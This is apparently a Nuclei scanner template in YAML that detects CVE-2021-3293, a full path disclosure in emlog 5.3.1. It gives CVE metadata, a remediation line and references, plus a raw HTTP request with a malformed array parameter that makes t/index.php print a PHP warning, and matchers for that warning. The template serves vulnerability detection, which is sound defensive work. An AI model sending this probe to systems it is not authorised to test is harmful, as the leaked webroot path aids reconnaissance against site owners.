48 lines
1.4 KiB
YAML
48 lines
1.4 KiB
YAML
id: CVE-2021-3293
|
|
|
|
info:
|
|
name: emlog 5.3.1 Path Disclosure
|
|
author: h1ei1
|
|
severity: medium
|
|
description: emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file.
|
|
remediation: |
|
|
Apply the latest patch or upgrade to a version that fixes the vulnerability.
|
|
reference:
|
|
- https://github.com/emlog/emlog/issues/62
|
|
- https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-3293
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2021-3293
|
|
cwe-id: CWE-22
|
|
epss-score: 0.003
|
|
epss-percentile: 0.66142
|
|
cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: emlog
|
|
product: emlog
|
|
tags: cve,cve2021,emlog,fpd
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /t/index.php?action[]=aaaa HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<b>Warning</b>"
|
|
- "on line"
|
|
- "expects parameter"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a0046304402204eb7dd017ccb8727b0f4448ceff5a6264f2c5c023e4b03c5de48e4317ea3ebc00220562344361bccee94aca0d78e1dc626771da6fcbd6e879e1e6e843c1172cd2d96:922c64590222798bb761d5b6d8e72950
|